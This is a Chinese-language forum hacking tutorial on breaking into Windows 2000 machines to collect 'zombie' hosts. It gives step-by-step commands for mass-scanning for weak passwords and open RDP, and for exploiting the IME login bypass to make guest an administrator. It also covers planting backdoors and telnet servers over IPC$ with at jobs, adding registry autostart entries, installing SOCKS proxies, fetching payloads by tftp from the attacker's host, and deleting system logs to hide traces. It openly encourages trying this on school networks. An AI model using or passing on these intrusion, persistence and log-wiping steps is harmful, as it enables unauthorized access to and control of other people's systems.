很快的,扫描完成,结果出来了。点击右下脚的“删除”把多余的IP删了,只留下开了3389的IP。再点击“保存”,把结果保存到文件夹里。找到保存文件的目录,打开它。用记事本的替换功能把它保存为一个纯IP的TXT文件。“编辑-替换”在“查找内容”里输入要删除的垃圾,再点“全部替换”就行了。打开xscan,点击左边的蓝色按钮,进入“扫描板块”,只需在“SQL-Server弱口令”“NT-Server弱口令”前打钩,其他都清除掉。再点击右边的蓝色按钮,进入“扫描参数”,钩上“从文件获取主机列表”,打开刚才替换成纯IP的TXT文件,确定之后就可以扫描了。这时需要比较长的时间!(注意我是拿3.0为例的,其他的也差不多)。确定目标,用mstsc(登陆终端的工具,这个我不喜欢用,但确实很容易上手的)登陆对方主机后,打开对方cmd.exe,输入“net use”,先看看有没有人也在连接这部机(安全一点好,毕竟不是在学雷峰啊)。“net view”命令之后当出现一堆前面带\\字符的就表示~~就表示什么呢??我想大家都非常明白吧!,如果不明白的话,我。。(也不知道怎么说了 ) 想做个补充 发现很多朋友对什么叫终端服务有点模糊 好,我们就详细说说 毕竟这个概念很重要的 终端服务提供了通过作为终端仿真器工作的“瘦客户机”软件远程访问服务器桌面的能力。终端服务只把该程序的用户界面传给客户机。客户机然后返回键盘和鼠标单击动作,以便由服务器处理。每个用户都只能登录并看到它们自己的会话,这些会话由服务器操作系统透明地进行管理,而且与任何其他客户机会话无关。客户软件可以运行在多个客户机硬件设备上,包括计算机和基于 Windows 的终端。其他设备,如 Macintosh 计算机或基于 UNIX 的工作站,也可以使用其他第三方的软件连接到终端服务器。 终端服务可以在应用服务器模式或远程管理模式下在服务器上进行配置。作为应用服务器,终端服务提供了一种有效而可*的方式,通过网络服务器分发基于 Windows 的程序。在应用服务器模式下,终端服务为可能无法正常运行 Windows 的计算机显示 Windows 2000 的桌面以及目前基于 Windows 的大多数应用程序。在远程管理模式下使用时,终端服务提供了远程访问的能力,使您可以从网络上的任何地方虚拟地管理您的服务器。 终端服务有以下好处: 更快地显示 Windows 2000 的桌面。终端服务架设了一座从旧式桌面迁移到 Windows 2000 Professional 的桥梁,为非计算机桌面以及需要进行硬件升级才能在本地完全运行 Windows 2000 操作系统的计算机提供了一种虚拟的 Windows 2000 桌面环境。终端服务客户可用于多种不同的桌面平台,包括 MS-DOS、基于 Windows 的终端、Macintosh 和 UNIX。(与 MS-DOS、Macintosh 和基于 UNIX 的计算机的连接需要附加的软件)。 充分利用已有的硬件。终端服务扩展了分布式计算模型,允许计算机同时作为瘦客户机和具有完整功能的个人计算机操作。当计算机在现有的网络上时,可以继续使用,同时也可作为能仿真 Windows 2000 Professional 桌面的瘦客户机使用。 程序的集中配置。使用运行在 Windows 2000 Server 上的终端服务,所有程序的执行、数据的处理以及数据的存储都在服务器上进行,程序得以集中配置。终端服务可确保所有客户机都能访问当前版本的程序。软件只能在服务器上安装一次,而不能安装在您单位的每个桌面上,这样可减少单独更新计算机所花费的成本。 远程管理。终端服务提供了对 Windows 2000 Server 的远程管理,为系统管理员提供了从任何客户机通过广域网或拨号连接远程管理其服务器的一种方法。 功能: 易于使用 可管理性 安全性 易于使用 功能 说明 详细信息,请参阅: 自动的本地打印机支持 Windows 2000 Server 终端服务可以添加并自动重新连接终端服务客户所连接的打印机。提供对本地打印机的客户访问 剪贴板重定向 现在,用户可以在运行于本地计算机和终端服务器上的程序之间剪切和粘贴。共享的剪贴板 性能增强 对缓存功能的增强,包括持久性缓存、数据包的利用和数据帧大小,明显地改进了终端服务的性能。位图缓存 漫游式断开连接支持 此功能使用户不用注销即可从会话中断开连接。在断开时会话仍可保持活动状态,这使得用户可以从另一台计算机中或在稍后某个时间重新连接到现有会话。重新连接需要登录,以便在任何时候都能保证每个会话的安全性。注销或断开连接 多登录支持 用户可以登录到多个会话,同时从一个或多个客户机到多个 Windows 2000 Server,或者多次登录到一个服务器。这样,用户就可以同时执行多项任务或运行多个单独的桌面会话。管理用户和客户机 可管理性 功能 说明 详细信息,请参阅: 会话远程控制 支持者可查看或控制另一终端服务会话。键盘输入、鼠标移动以及图形显示可在两个终端服务会话之间共享,为支持者提供了诊断和解决配置问题以及远程培训用户的能力。此功能对于带有分支机构的单位特别有用。远程控制 网络负载平衡 网络负载平衡使终端服务客户可连接到运行终端服务的服务器组中最轻闲的成员。网络负载平衡和终端服务 基于 Windows 的终端 根据 Windows CE 操作系统和远程桌面协议 (RDP) 的自定义实现,不同的制造商可提供基于 Windows 的终端。 客户连接管理器 管理员和用户可以为一个程序或全部桌面访问建立到服务器的预定义连接。客户连接管理器在客户机桌面上创建图标,以便能通过一次单击连接到一个或多个终端服务器。想在计算环境中提供单个程序的管理员可以创建连接并将该连接与终端服务客户软件一同分发。管理终端服务用户连接 终端服务授权 终端服务授权帮助系统管理员和采购部门跟踪客户机及其相关许可证。授权终端服务 分布式文件系统 (DFS) 支持 对分布式文件系统 (DFS) 的支持使用户可以连接到 DFS 共享位置,而且使管理员可以从终端服务器主控 DFS 共享。分布式文件系统概述 终端服务管理器 管理员可以使用终端服务管理器查询和管理 Windows 2000 Server 上的终端服务会话、用户和进程。管理终端服务 终端服务配置 终端服务连接配置可用于创建、修改和删除 Windows 2000 Server 上的一个或一组会话并访问服务器设置。配置终端服务 与 Windows 2000 Server“本地用户和组”以及“Active Directory 用户和计算机”的集成 管理员可以按照为 Windows 2000 Server 用户创建帐户的相同方式为终端服务用户创建帐户。另有一些字段可用来指定终端服务专用信息,如终端服务配置文件路径和主目录。终端服务用户帐户 与 Windows 2000 Server 系统监视器的集成 与 Windows 2000 Server 系统监视器的集成使管理员可以监视器终端服务系统性能,包括跟踪处理器的使用情况、内存分配和分页内存使用情况,并在每个用户的会话之间交换。性能监视 消息传递支持 管理员可以就一些重要的信息警告用户,如系统关机、升级或新程序。使用终端服务管理器 远程管理 具有管理级特权而且可访问终端服务管理级实用程序的任何用户都可以远程管理运行终端服务的服务器的各方面工作。 可配置的会话超时设置 管理员可以通过配置会话超时来减少服务器资源的使用。管理员可以指定活动会话的长度以及会话可在服务器上闲置多长时间 配置会话限制 安全性 功能 说明 详细信息,请参阅: 加密 多级加密使管理员可以根据安全性需要在三种不同级别(低级、中级或高级)上加密在 Windows 2000 Server 和终端服务客户之间传输的所有或部分数据。另外,终端服务登录过程包括更改密码、桌面解锁以及屏幕保护功能解锁。登录过程是加密的,以确保用户名称和密码的安全传输。终端服务支持在服务器和客户机之间的 40 位和 128 位加密(128 位加密只能在美国和加拿大使用)。确定加密的级别 限制登录尝试和连接时间 管理员可以限制用户登录尝试次数,以防止有人未授权访问服务器。另外,个别用户或分组用户的连接时间可以进行限制。配置终端服务 终端服务配置概述 终端服务连接提供了客户机可用于登录到服务器上某个会话的链接。TCP/IP 连接是当终端服务在 Windows 2000 Server 上启用时自动配置的。使用终端服务配置,您可以更改连接的默认属性或添加新连接。 终端服务配置 打开终端服务配置时,您将会看到已经配置的连接。这称为 RDP-TCP 连接。通常,这只是需要为使用终端服务器的客户配置的连接。对于终端服务器,只能为每个网卡配置一个 RDP(远程桌面协议)连接。如果要配置其他的 RDP 连接,您必须安装附加的网卡。 使用终端服务配置,您可以重新配置 RDP-TCP 连接的属性,包括限制客户机会话在服务器上保持活动状态的时间、设置加密的保护级别以及选择您希望用户和组具备的权限。某些连接属性也可以使用“本地用户和组”的终端服务扩展程序在每用户基础上配置。例如,当您使用“本地用户和组”的终端服务扩展程序时,可以为每个用户设置不同会话期限。使用终端服务配置,您可以只在每连接基础上设置会话期限,这意味着相同期限将应用于使用连接登录到服务器的所有用户。 除配置连接以外,您可以使用“终端服务配置”功能配置可应用于终端服务器的设置。包括临时文件夹的设置、默认连接安全性以及启用/禁用 Internet 连接器许可。详细信息,请参阅配置服务器设置。 基于 Citrix CA 的客户机 终端服务配置还用于为基于 Citrix CA 的客户机配置连接。当 Citrix CA 协议和基于 Citrix CA 的客户软件添加到该系统时,可以使用 TCP/IP、同步、IPX/SPX 或 NetBIOS 传输协议配置这些连接 有很多朋友问怎么开启3389终端服务下面我们一起来探索一下远程开启3389的方法.首先我们应该了解3389终端服务,可以运行在什么系统下,个人了解,终端服务在M$的大部分 产品中都可运行,如:winnt4/win2000server/win2000ADV-server/win2000DS/XP等. 但winnt4中是需要单独购买的,2000专业版不能远程安装终端服务的,至少我没成功过. 我们在以下的探索中,是以win2000server和高级server为例的.(现在用的也最多). 现在开始.假设我们拿到了一个主机的管理员帐户和密码. 主机: 192.168.0.1 帐号: administrator 密码: 7788 2000系统安装在c:\winnt下 从上面的的介绍可以知道,2000专业版是不可以远程安装终端服务的,那我们就要首先来 判断此主机是专业版还是服务器版,才能进入下一个环节.我们可以先用对方所开帐户判断: c:\>letmein \\192.168.0.1 -all -d stating connecting to server ... Server local time is: 2002-1-13 10:19:22 Start get all users FORM server... -------------------------- Total = 5 -------------------------- num0= Administrator () num1= Guest () num2= IUSR_servername (Internet 来宾帐号 ) num3= IWAM_servername (启动 IIS 进程帐号) num4= TsInternetUser (TsInternetUser) -------------------------- Total = 5 -------------------------- 一般情况num2/3/4这三个帐户都是2000server默认开启的. 2000专业版默认是不开这些帐户的.我们也可以扫描对方开放的端口进一步确认: 用扫描软件如:superscan3.exe扫描对方所开端口 判断对方是否开启25,3372等2000server默认开启的端口.当然我们还可以使用一些工具,如:cmdinfo.zip 这2个东东可以获得本地或远程NT/2K主机的版本,系统路径,源盘路径,PACK版本,安装时间等一 系列信息,一个图形界面,一个命令行. 通过返回的信息就可以很清楚的了解对方主机情况.还有一些其他的方法来判断,如:从对方所开的服务来确定等, 从上面的判断准确率还算高,别的就不一一说明了. 如果你在以上步骤里发现对方主机并没有那3个帐户,默认端口也没开, 或cmdinfo返回的信息对方是2000专业版,你就要放弃安装3389的计划了. 现在我们要进入下一环节: 判断终端服务到底有没有安装? 你也许要问:为什么还要判断啊?我扫描没有发现3389端口啊 这里就需要解释一下,如果装了终端服务组件,可能有哪几种情况扫描不到3389端口? 1.终端服务termservice在"管理工具">>>"服务"中被禁用. 2.终端服务连接所需的RDP协议在"管理工具">>>"终端服务配置"中被停用连接. 3.终端服务默认连接端口3389被人为的改变.如何改变请看修改终端服务默认的3389端口 4.终端服务绑定的网络适配器不是外网的. 5.防火墙和端口过滤之类的问题. 6.....(还有我没想到的) 其实,我们遇到最多的情况就是以上5种情况.现在开始判组件是否被安装.先与远程主机连接,映射远程主机C盘为本地Z盘 net use z: \\192.168.0.1\c$ "7788" /user:"administrator" 命令成功完成。然后转到Z盘,检查 Z:\Documents and Settings\All Users\「开始」菜单\程序\管理工具> 里是否有 "终端服务管理器"和"终端服务配置"的快捷方式文件 如有已安装服务组件的会有,反之,没有(98% 人为故意删的可能性较小) 我们还可以在下一步telnet到对方主机后使用终端服务自带的命令进一步的核实.判断完毕,对方好像是没有安装终端服务组件,可以进入下一步: telnet登陆对方主机,准备安装服务组件.在这里,我强烈建议使用2000自带的telnet服务端登陆, 有回显,不容易出错.个人感觉使用它,一次成功的比例高很多.(呵呵~,个人理解啊!) 就算没有开,打开用完后再关掉就完了. .abu.写的最快速登录WIN2K TELNET 服务已经把这个方法介绍的非常详细, 而且他的办法(在本机建立同名,同密码帐户),让快速实现telnet登陆成为现实.假如我们已开启对方23端口, telnet 192.168.0.1 输入用户名/密码 *=============================================================== 欢迎使用 Microsoft Telnet 服务器。 *=============================================================== C:\> \\成功进入!!!! 进入后,再次检查终端组件是否安装: c:\>query user 这个工具需要安装终端服务.这样就进一步确定了组件没有被安装.如果返回: USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME >w1 console 0 运行中 .2002-1-12 22:5 \\类似这样的信息,可能组件就已安装.好!都清楚了,可以开始安装了. --------------------------------------------------- C:\>dir c:\sysoc.inf /s //检查INF文件的位置 c:\WINNT\inf 的目录 2000-01-10 20:00 3,770 sysoc.inf 1 个文件 3,770 字节 ----------------------------------------------------- C:\> dir c:\sysocmgr.* /s //检查组件安装程序 c:\WINNT\system32 的目录 2000-01-10 20:00 42,768 sysocmgr.exe 1 个文件 42,768 字节 ----------------------------------------------------- c:\>echo [Components] > c:\wawa c:\>echo TSEnable = on >> c:\wawa //这是建立无人参与的安装参数 c:\>type c:\wawa [Components] TSEnable = on //检查参数文件 ------------------------------------------------------ c:\>sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\wawa /q ----------------------------------------------------- 这一条就是真正安装组件的命令. 以上这条命令没有加/R参数,主机在安装完后自动重起. 如若加了/R参数主机就不会重起.如果一切正常的话,几分钟后对方主机将会离线,当它重新回来时, 3389终端服务就已经开启.你就可以连上去了.问题和建议: A 在安装过程中,不使用/R,有时主机也不会重起,你就要手动重起他,但在使用诸如:iisreset /reboot命令时,对方 的屏幕会出现个对话框,写着谁引起的这次启动,离重起还有多少秒.B 一次不行可以再试一次,在实际中很有作用.C 在输入sysocmgr命令开始安装时,一定不要把命令参数输错,那会在对方出现一个大的对话框,是sysocmgr的帮助,很是显眼, 而且要求确定.在你的屏幕上是不会有任何反应的,你不会知道出错,所以会有B的建议. 好了以后你就想干什么就干什么了。不过有时候还真不知道干什么,总之得干个事,装个什么局域网控制软件,不过不要体积太大,容易被发现。 超强 C 语言代码,你有信心看懂吗? 刚刚说有输入法漏洞的机子很少了,但有些朋友担心还有怎么办,不是吃大亏了吗?这样我找了一篇写的不错的文章贴一下( 注意是转载)写的不错,据说是新写的,这位大哥也真闲啊 WIN2000中文简体版存在的输入法漏洞,可以使本地用户绕过身分验证机制进入系统内部。经实验,WIN2000中文简体版的终端服务,在远程操作时仍然存在这一漏洞,而且危害更大。 WIN2000的终端服务功能,能使系统管理员对WIN2000进行远程操作,采用的是图形界面,能使用户在远程控制计算机时功能与在本地使用一样,其默认端口为3389,用户只要装了WIN2000的客户端连接管理器就能与开启了该服务的计算机相联。因此这一漏洞使终端服务成为WIN2000的合法木马。 工具:客户端连接管理器,下载地址:自己找吧,天天有好几种呢。 入侵步骤: 一,获得管理员账号。 我们先对一个网段进行扫描,扫描端口设为3389,运行客户端连接管理器,将扫描到的任一地址加入到,设置好客户端连接管理器,然后与服务器连结。几秒钟后,屏幕上显示出WIN2000登录界面(如果发现是英文或繁体中文版,放弃,另换一个地址),用CTRL+SHIFT快速切换输入法,切换至全拼,这时在登录界面左下角将出现输入法状态条(如果没有出现,请耐心等待,因为对方的数据流传输还有一个过程)。用右键点击状态条上的微软徽标,弹出“帮助”(如果发现“帮助”呈灰色,放弃,因为对方很可能发现并已经补上了这个漏洞),打开“帮助”一栏中“操作指南”,在最上面的任务栏点击右键,会弹出一个菜单,打开“跳至URL”。此时将出现WIN2000的系统安装路径和要求我们填入的路径的空白栏。比如,该系统安装在C盘上,就在空白栏中填入"c:\winnt\system32"。然后按“确定”,于是我们就成功地绕过了身份验证,进入了系统的SYSTEM32目录。 现在我们要获得一个账号,成为系统的合法用户。在该目录下找到"net.exe",为"net.exe"创建一个快捷方式,右键点击该快捷方式,在“属性”->“目标”->c:\winnt\system32\net.exe后面空一格,填入"user guest /active :yes"点“确定”。这一步骤目的在于用net.exe激活被禁止使用的guest账户,当然也可以利用"user 用户名 密码/add",创建一个新账号,但容易引起网管怀疑。运行该快捷方式,此时你不会看到运行状态,但guest用户已被激活。然后又修改该快捷方式,填入"user guest 密码",运行,于是guest便有了密码。最后,再次修改,填入“localgroup administrators guest /add,将guest变成系统管理员。 注意事项:1、在这过程中,如果对方管理员正在使用终端服务管理器,他将看到你所打开的进程id,你的ip和机器名,甚至能够给你发送消息。 2、终端服务器在验证你的身份的时候只留给了你一分钟的时间,在这一分钟内如果你不能完成上述操作,你只能再连结。 3、你所看到的图像与操作会有所延迟,这受网速的影响。 二,创建跳板。 再次登录终端用务器,以"guest"身份进入,此时guest已是系统管理员,已具备一切可执行权。打开“控制面板”,进入“网络和拔号连接”,在“本地连接”或“拔号连接”中查看属性,看对方是否选择“Microsoft 网络的文件和打印机共享”,如果没有,就打上勾。对方如果使用的是拔号上网,下次拔号网络共享才会打开。 退出对方系统,在本地机命令提示符下,输入 net use \\IP Address\IPC$ ["password"] /user:"guset",通过IPC的远程登陆就成功了。 登陆成功之后先复制一个Telnet的程序上去(小榕流光安装目录下的Tools目录里的Srv.exe,另外,还有ntml.xex,一会要用),这个程序是在对方上面开一个Telnet服务,端口是99。 copy c:\hack\srv.exe \\***.***.***.***\admin$ 然后利用定时服务启动它,先了解对方的时间: net time \\***.***.***.*** 显示: \\***.***.***.*** 的当前时间是 2001/1/8 下午 08:55 命令成功完成。 然后启动srv.exe: at \\***.***.***.*** 09:00 srv.exe  显示: 新加了一项作业,其作业 ID = 0 过几分钟后,telnet ***.***.***.*** 99 这里不需要验证身份,直接登录,显示: c:\winnt:\system32> 我们就成功登陆上去了。然后又在本地打开命令提示符,另开一个窗口,输入: copy c:\hack\ntlm.exe \\211.21.193.202\admin$ 把事先存放在hack目录里的ntlm.exe拷过去。然后又回到刚才的telnet窗口,运行ntlm.exe C:\WINNT\system32>ntlm 显示: Windows 2000 Telnet Dump, by Assassin, All Rights Reserved. Done! C:\WINNT\system32> C:\WINNT\system32> 好,现在我们来启动WIN2000本身的telnet,首先终止srv.exe的telnet服务: net stop telnet 系统告诉你并没有启动telnet,不理它,继续: net start telnet 这次真的启动了telnet,我们可以在另开的命令提示符窗口telnet到对方的 23端口,验证身份,输入我们的guest账号和密码,它就真正成为我们的跳板了。我们可以利用它到其它的主机去。 三、扫除脚印: 删除为net.exe 创建的快捷方式,删除winnt\system32\logfiles下边的日志文件 第14章 从简单的网络命令讲起 昨天的帖子发表后,很多朋友问了很多问题,我发现很多朋友对基本的网络命令还很生疏,请你看这个帖子,里面讲的很详细的http://www.91one.net/dvbbs/dispbbs.asp?boardID=14&ID=403 有个朋友问了我个问题:端口映射是什么意思?? 其实很简单的,采用端口映射(Port Mapping)的方法,可以实现从Internet到局域网内部机器的特定端口服务的访问。例如,你所使用的机子处于一个连接到Internet的局域网内,你在机子上所开的所有服务(如FTP),默认情况下外界是访问不了的。这是因为你机子的IP是局域网内部IP,而外界能访问的只有你所连接的服务器的IP,由于整个局域网在Internet上只有一个真正的IP地址,而这个IP地址是属于局域网中服务器独有的。所以,外部的Internet登录时只可以找到局域网中的服务器,那你提供的服务当然是不起作用的。 所以解决这个问题的方法就是采用PM了。 有篇文章不错。大家看看:http://www.pconline.com.cn/pcedu/soft/lan/jywgl/10301/127157.html 继续讲,昨天有人说我找到个肉鸡,但不会用远程控制软件。先说用什么好呢 我推荐Remote Administrator,有篇介绍它的文章很好:http://www.pcworld.com.cn/2002/back_issues/2205/0533e.asp 下载:http://www.skycn.com/soft/15592.html 我想里面的说明你应该能很好理解的 现在我以一个例子来说一下怎么获得一个肉鸡,虽然前面一直在说,但好象有点乱的,下面说的这个有点投机取巧的感觉,至少我这样觉得,不过因为很多朋友说都5天了,我什么都没搞到啊,所以只能。。 第一步:扫描弱口令 这里我用20cn开发的scanipc (这http://down.yqdown.com/xdown/yqdown0316/scanipc.rar有下的) 不一会就会扫到很多有弱口令的主机 (你可以拿你们学校的IP试试) 这里我用opentelnet(远程启动TELNET的小东西,这里下:http://www.infosw.com/down/software.asp?id=1520)给扫描到开了空口令的主机开个端口让我们telnet连接上去 ,开了23端口,并可以连接上的主机就不用进行次步骤了! Opentelnet使用方法: OpenTelnet.exe \\server <帐号> <密码> 列如: C:\>OpenTelnet.exe \\192.168.1.2 administrator 123456 1 90 用户名:administrator 密码:123456 NTLM认证方式:1(也可以选择0请自己测试) 开的端口:90 运行完,如果屏幕上出现 Disconnecting server...Successfully! 就说明已经成功。 这样,我们就能够得到一个开90端口的Telnet服务器了。 Telnet 192.168.1.2 90 这样就可以登录上去了。 第三步:配置并安装后门程序 这里我选择WinShell(小巧精干我喜欢下载:http://www.hktk.com/soft/soft_server/winshell.html),用winshell主程序设置好后门,然后把后门程序传到台FTP空间上! 列如: c:\>ftp ftp>openwww.cnwill.com 然后输入用户名字 密码把后门传上去mput c:\cnwill.exe 现在我们登陆到肉鸡上 Telnet 192.168.1.2 90 把刚上传的后门程序下载并运行(别忘记删除 后门程序) 『后门也可以用net命令完成』 net user \\192.168.1.2 90\ipc$ "" /user:"administrator" [ 建 立 IPC$ 连 接 ] copy d:\zilong.exe \\192.168.1.2 90\admin$\system32 [ 上 传 一 个 后 门 程 序 到 对 方 的 主 机 里] copy d:\long.exe \\192.168.1.2 90\admin$\system32 [上 传 一 个 删 除 日 志 程 序 到 对 方 的 主 机 里] copy d:\scoks.exe \\192.168.1.2 90\admin$\system32 [ 上 传 一 个 SCOKS 代 理 程 序 到 对 方 的 主 机 里] copy d:\zilong.reg \\192.168.1.2 90\admin$\system32 [上 传 导 入 注 册 表的 REG 文 件 到 对 方 的 主 机 里]请看后门说明 net time \\192.168.1.2 90 [ 得 到 对 方 主 机 的 当 前 时 间] at \\192.168.1.2 90 13:20 zilong.exe [用 a t命 令 执 行 我 们 的 后 门 程 序] 别 把 时 间 搞 错 了 哦 ============== 如果大家用不习惯命令的话,那就用流光的IPC种植者吧,简单易用.这里就不赘述啦 ============= telnet 192.168.1.2 90 [ 从 我 们 设 置 的 后 门 程 序 登 陆 主 机 ] net user **** /add [近来后添加一个用户名再说或者也可以选择激活guest] net localgroup administrators **** /add [ 把 自 己 添 加 到 管 理 组 里,这 样 我 们 就 是 超 级 管 理 员 了] regedit /s c:\winnt\system32\zilong.reg [ 把 后 门 程 序 导 入 注 册 表 的 启 动 项]这样做是防止被别人停止我们 的后门服务程序,就算我们的后门服务程序被停止了,在主机重启动后我们的后门 服务就又继续运行了. SOCKS -install [ 开 始 安 装 socks 代 理] SCOKS -config starttype 2 [ 使 SOCKS 代 理 程 序 自 动 运 行,不 怕 肉 鸡 再 重 启 了] socks -config port 1080 [ socks 代 理 端 口 设 置 为 1080 ] net start skserver [ 启 动 SOCKS 代 理 服 务 ]可以打开QQ设置IP代理了 long [ 刚 才 上 传 的 一 个 删 除 日 志 程 序,运 行 它 就 可 以 了] 第15章 从telnet讲起 前几天我说到过telnet,好象很多朋友不太明白,也不会用,我想这主要是因为你的命令掌握不太牢*啊,我今天就把telnet详细讲一遍,再说一些简单的网络相关命令 先说telnet,什么是telnet?Telnet服务虽然也属于客户机/服务器模型的服务,但它更大的意义在于实现了基于Telnet协议的远程登录(远程交互式计算),那么什么是远程登录? 我想这个大家都明白一点,定义:远程登陆是指用户使用Telnet命令,使自己的计算机暂时成为远程主机的一个仿真终端的过程。仿真终端等效于一个非智能的机器,它只负责把用户输入的每个字符传递给主机,再将主机输出的每个信息回显在屏幕上。 使用Telnet协议进行远程登陆时需要满足以下条件:在本的计算机上必须装有包含Telnet协议的客户程序;必须知道远程主机的Ip地址或域名;必须知道登录标识与口令。 Telnet远程登录服务分为以下4个过程: 1)本地与远程主机建立连接。该过程实际上是建立一个TCP连接,用户必须知道远程主机的Ip地址或域名; 2)将本地终端上输入的用户名和口令及以后输入的任何命令或字符以NVT(Net Virtual Terminal)格式传送到远程主机。该过程实际上是从本地主机向远程主机发送一个IP数据报; 3)将远程主机输出的NVT格式的数据转化为本地所接受的格式送回本地终端,包括输入命令回显和命令执行结果; 4)最后,本地终端对远程主机进行撤消连接。该过程是撤销一个TCP连接。 再说一下什么叫Telnet协议?简单点说Telnet协议是TCP/IP协议族中的一员,是Internet远程登陆服务的标准协议。应用Telnet协议能够把本地用户所使用的计算机变成远程主机系统的一个终端。它提供了三种基本服务: 1)Telnet定义一个网络虚拟终端为远的系统提供一个标准接口。客户机程序不必详细了解远的系统,他们只需构造使用标准接口的程序; 2)Telnet包括一个允许客户机和服务器协商选项的机制,而且它还提供一组标准选项; 3)Telnet对称处理连接的两端,即Telnet不强迫客户机从键盘输入,也不强迫客户机在屏幕上显示输出。 关于这个就说这么多了,至于其他的一些就不说了,因为没什么帮助对我门,如果你有兴趣,可以去本站查查相关资料 再说说Win2000的Telnet服务,因为大部分服务器用的都是2000的 Win2000为我们提供了Telnet客户机和服务器程序:Telnet.exe是客户机程序(Client),tlntsvr.exe是服务器程序(server),同时它还为我们提供了Telnet服务器管理程序tlntadmn.exe。其实从应用层面上,Win2000的Telnet服务并没有什么可说的,绝大部分内容你都可以从HELP文件中得到,我在此只是把它稍微整理一下而已.Windows 2000 默认安装了 Telnet 服务,但是并没有默认启动。下面给出HELP文件中 Telnet 服务的一部分默认设置: AllowTrustedDomain:是否允许域用户访问。默认值是1,允许信任域用户访问。可以改为0: 不允许域用户访问(只允许本地用户)。 DefaultDomain:可以对与该计算机具有信任关系的任何域设置。默认值是"."。 DefaultShell:显示 shell 安装的路径位置。默认值是:%systemroot%\System32\Cmd.exe /q /k MaxFailedLogins:在连接终止之前显示尝试登录失败的最大次数。默认是3。 LoginScript:显示 Telnet 服务器登录脚本的路径位置。默认的位置就是“%systemroot%\System32\login.cmd”,你可以更改脚本内容,这样登录进Telnet的欢迎屏幕就不一样了。 NTLM:NTLM身份验证选项。默认是2。可以有下面这些值: 0: 不使用 NTLM 身份验证。 1: 先尝试 NTLM 身份验证,如果失败,再使用用户名和密码。 2: 只使用 NTLM 身份验证。 TelnetPort:显示 telnet 服务器侦听 telnet 请求的端口。默认是:23。你也可以更改为其他端口。 以上各项设置你可以使用tlntadmn.exe(Telnet服务器管理程序)来进行非常方便的配置,配置后需要重新启动Telnet服务。如图1 2 NTLM 提到了telnet就不能不提NTLM,我想这也是让入侵者最为头痛的一件事,哪怕你获得了管理员帐号和密码,想简单通过NTLM也并非易事,况且win2000中的telnet默认仅以NTLM方式验证身份,这就让我们不得不关注NTLM这个东东,那么什么是NTLM呢? 早期的SMB协议在网络上明文传输口令,后来出现了"LAN Manager Challenge/Response"验证机制,简称LM,它十分简单以至很容易被破解,微软随后提出了WindowsNT挑战/响应验证机制,即NTLM。现在已经有了更新的NTLMv2以及Kerberos验证体系。NTLM工作流程是这样的: 1、客户端首先在本地加密当前用户的密码成为密码散列 2、客户端向服务器发送自己的帐号,这个帐号是没有经过加密的,明文直接传输 3、服务器产生一个16位的随机数字发送给客户端,作为一个 challenge(挑战) 4、客户端再用加密后的密码散列来加密这个 challenge ,然后把这个返回给服务器。作为 response(响应) 5、服务器把用户名、给客户端的challenge 、客户端返回的 response 这三个东西,发送域控制器 6、域控制器用这个用户名在 SAM密码管理库中找到这个用户的密码散列,然后使用这个密码散列来加密 challenge。 7、域控制器比较两次加密的 challenge ,如果一样,那么认证成功。 从上面的过程我们可以看出,NTLM是以当前用户的身份向Telnet服务器发送登录请求的,而不是用你扫到的对方管理员的帐户和密码登录,显然,你的登录将会失败。举个例子来说,你家的机器名为A(本地机器),你入侵的机器名为B(远地机器),你在A上的帐户是xinxin,密码是1234,你扫到B的管理员帐号是Administrator,密码是5678,当你想Telnet到B时,NTLM将自动以当前用户的帐号和密码作为登录的凭据来进行上面的7项操作,即用xinxin和1234,而并非用你扫到的Administrator和5678,且这些都是自动完成的,根本不给你插手的机会,因此你的登录操作将失败。 由于Telnet服务器对NTLM的使用有3个选项,所以当你Telnet远地机器时,会显示下面情况中的一种: 1)身份验证选项=0时 ===================================== Microsoft (R) Windows (TM) Version 5.00 (Build 2195) Welcome to Microsoft Telnet Service Telnet Server Build 5.00.99201.1 login: password: \\为0时不使用NTML身份验证,直接输入用户名和密码,比如你可以输入扫到的Administrator和5678 2)身份验证选项=1时 ===================================== NTLM Authentication failed due to insufficient credentials.Please login withclear text username and password Microsoft (R) Windows (TM) Version 5.00 (Build 2195) Welcome to Microsoft Telnet Service Telnet Server Build 5.00.99201.1 login: password: \\先尝试 NTLM 身份验证,如果失败,再使用用户名和密码,其实这种方式对于我们来说,与上一种方式没什么区别 3)身份验证选项=2时 ===================================== NTLM Authentication failed due to insufficient credentials.Please login withclear text username and password Server allows NTLM authentication only Server has closed connection 遗失对主机的连接。 C:\> \\仔细看看上面的显示,根本没有给你输入用户名和密码的机会,直接断开连接,扫到了密码也是白扫 所以对于入侵者来说,NTLM是横在我们面前的一座大山,必须要除掉它,一般我们有如下几种方法: 1通过修改远程注册表更改telnet服务器配置,将验证方式从2改为1或0; 2使用NTLM.exe,上传后直接运行,可将telnet服务器验证方式从2改为1; 3在本地建立扫描到的用户,以此用户身份开启telnet客户机并进行远程登录; 4使用软件,比如opentelnet.exe(需要管理员权限且开启IPC管道) 5使用脚本,如RTCS,(需要管理员权限但不依赖IPC管道) 基本上是以上的5种,其中后两种是我们比较常用的开telnet的手法,而且使用方法十分简单,命令如下: OpenTelnet.exe \\server username password NTLMAuthor telnetport OpenTelnet.exe \\服务器地址 管理员用户名 密码 验证方式(填0或1) telnet端口 cscript RTCS.vbe targetIP username password NTLMAuthor telnetport cscript RTCS.vbe <目标IP> <管理员用户名> <密码> <验证方式> 那telnet上去后不知道该做什么了?很多朋友这样问了,我想如果你是从第1天看的,应该知道吧,我就再说说吧 1 查看系统信息 呵呵,其实就是随处看看,看看他的系统配置和版本(用type c:\boot.ini来知道pro版或server版),看看都装了什么服务或软件(从目录名就可以知道了),看看有什么重要或有趣的文件啦(唉,要是国外的机器,看也看不懂),看看他的用户情况,总之就是尽可能多的了解系统,为一会装后门摸底。 2 使用tftp传送文件 想必大家都遇到过在telnet中传输文件的问题,因为我们习惯了在ipc管道中的文件传输,所以有些朋友喜欢用net share ipc$ 来打开管道,进而利用copy来传输文件。不过这样反而麻烦,既然我们已经得到了shell(这个前面已经很详细的说过了)们可以用TFPT命令来完成这一切,什么是TFTP呢? 用TFTP(Trivial File Transfer Protocol)来实现文件的传送是一种基于UDP连接的文件传输,一般是使用Windows自带的tftp.exe和一个TFTP服务器端软件构成一个完整的传输结构。它是这样使用的:首先运行本地的TFTP Server(比如tftpd32.exe)软件并保证始终开启直至传输全部完成,然后在telnet中(当然你也可以在其他shell中)运行下面的命令: C:\>tftp –i ip get xinxin.exe c:\abc\xinxin.exe 